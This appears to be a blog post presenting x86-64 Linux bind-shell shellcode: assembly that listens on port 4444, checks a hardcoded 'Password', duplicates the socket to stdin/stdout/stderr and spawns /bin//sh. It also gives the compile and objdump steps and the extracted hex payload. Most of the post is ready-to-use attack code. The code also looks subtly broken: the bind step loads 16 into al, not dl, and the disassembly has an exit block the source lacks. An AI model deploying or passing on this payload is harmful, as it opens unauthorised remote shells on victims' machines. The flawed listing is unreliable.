global _start section .text _start: ; sock = socket(AF_INET, SOCK_STREAM, 0) ; AF_INET = 2 ; SOCK_STREAM = 1 ; syscall number 41 xor rax, rax mov al, 41 xor rdi, rdi mov dil, 2 xor rsi, rsi mov sil, 1 xor rdx, rdx syscall ; copy socket descriptor to rdi for future use mov rdi, rax ; server.sin_family = AF_INET ; server.sin_port = htons(PORT) ; server.sin_addr.s_addr = INADDR_ANY ; bzero(&server.sin_zero, 8) xor rax, rax push rax mov dword [rsp-4], eax mov word [rsp-6], 0x5c11 ; port 4444 mov byte [rsp-8], 0x2 sub rsp, 8 ; bind(sock, (struct sockaddr *)&server, sockaddr_len) ; syscall number 49 xor rax, rax mov al, 49 mov rsi, rsp xor rdx, rdx mov al, 16 syscall ; listen(sock, MAX_CLIENTS) ; syscall number 50 xor rax, rax mov al, 50 xor rsi, rsi mov sil, 2 syscall ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) ; syscall number 43 xor rax, rax mov al, 43 sub rsp, 16 mov rsi, rsp push 16 mov rdx, rsp syscall mov r9, rax ; store the client socket description xor rax, rax ; close parent mov al, 3 syscall xchg rdi , r9 xor rsi , rsi ; duplicate sockets
dup2: push 0x21 pop rax syscall inc rsi cmp rsi , 0x2 loopne dup2 Checkpass: xor rax , rax push 0x10 pop rdx sub rsp , 16 ; 16 bytes to receive user input mov rsi , rsp xor edi , edi syscall ; read() mov rax , 0x64726f7773736150 ; "Password" lea rdi , [rel rsi] scasq jz Shell push 0x3c pop rax syscall Shell: xor rax, rax ; First NULL push push rax mov rbx, 0x68732f2f6e69622f ; push /bin//sh in reverse push rbx mov rdi, rsp ; store /bin//sh address in RDI push rax ; Second NULL push mov rdx, rsp ; set RDX push rdi ; Push address of /bin//sh mov rsi, rsp ; set RSI ; Call the Execve syscall add rax, 59 syscall
Compile it with nasm
nasm -f elf64 MyBindShell.nasm -o bindshell.o
Looking for nulls in objdump
objdump -d bindshell.o -M intel
bindshell.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <_start>:
0: 48 31 c0 xor rax,rax
3: b0 29 mov al,0x29
5: 48 31 ff xor rdi,rdi
8: 40 b7 02 mov dil,0x2
b: 48 31 f6 xor rsi,rsi
e: 40 b6 01 mov sil,0x1
11: 48 31 d2 xor rdx,rdx
14: 0f 05 syscall
16: 48 89 c7 mov rdi,rax
19: 48 31 c0 xor rax,rax
1c: 50 push rax
1d: 89 44 24 fc mov DWORD PTR [rsp-0x4],eax
21: 66 c7 44 24 fa 11 5c mov WORD PTR [rsp-0x6],0x5c11
28: c6 44 24 f8 02 mov BYTE PTR [rsp-0x8],0x2
2d: 48 83 ec 08 sub rsp,0x8
31: 48 31 c0 xor rax,rax
34: b0 31 mov al,0x31
36: 48 89 e6 mov rsi,rsp
39: 48 31 d2 xor rdx,rdx
3c: b0 10 mov al,0x10
3e: 0f 05 syscall
40: 48 31 c0 xor rax,rax
43: b0 32 mov al,0x32
45: 48 31 f6 xor rsi,rsi
48: 40 b6 02 mov sil,0x2
4b: 0f 05 syscall
4d: 48 31 c0 xor rax,rax
50: b0 2b mov al,0x2b
52: 48 83 ec 10 sub rsp,0x10
56: 48 89 e6 mov rsi,rsp
59: 6a 10 push 0x10
5b: 48 89 e2 mov rdx,rsp
5e: 0f 05 syscall
60: 49 89 c1 mov r9,rax
63: 48 31 c0 xor rax,rax
66: b0 03 mov al,0x3
68: 0f 05 syscall
6a: 49 87 f9 xchg r9,rdi
6d: 48 31 f6 xor rsi,rsi
0000000000000070 <dup2>:
70: 6a 21 push 0x21
72: 58 pop rax
73: 0f 05 syscall
75: 48 ff c6 inc rsi
78: 48 83 fe 02 cmp rsi,0x2
7c: e0 f2 loopne 70 <dup2>
000000000000007e <Checkpass>:
7e: 48 31 c0 xor rax,rax
81: 6a 10 push 0x10
83: 5a pop rdx
84: 48 83 ec 10 sub rsp,0x10
88: 48 89 e6 mov rsi,rsp
8b: 31 ff xor edi,edi
8d: 0f 05 syscall
8f: 48 b8 50 61 73 73 77 movabs rax,0x64726f7773736150
96: 6f 72 64
99: 48 8d 3e lea rdi,[rsi]
9c: 48 af scas rax,QWORD PTR es:[rdi]
9e: 74 05 je a5 <Shell>
a0: 6a 3c push 0x3c
a2: 58 pop rax
a3: 0f 05 syscall
00000000000000a5 <Shell>:
a5: 48 31 c0 xor rax,rax
a8: 50 push rax
a9: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
b0: 2f 73 68
b3: 53 push rbx
b4: 48 89 e7 mov rdi,rsp
b7: 50 push rax
b8: 48 89 e2 mov rdx,rsp
bb: 57 push rdi
bc: 48 89 e6 mov rsi,rsp
bf: 48 83 c0 3b add rax,0x3b
c3: 0f 05 syscall
00000000000000c5 <Exit>:
c5: 6a 3c push 0x3c
c7: 58 pop rax
c8: 48 31 ff xor rdi,rdi
cb: 0f 05 syscall
No nulls! Time to pull the hex out of the objdump output.
for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
No comments:
Post a Comment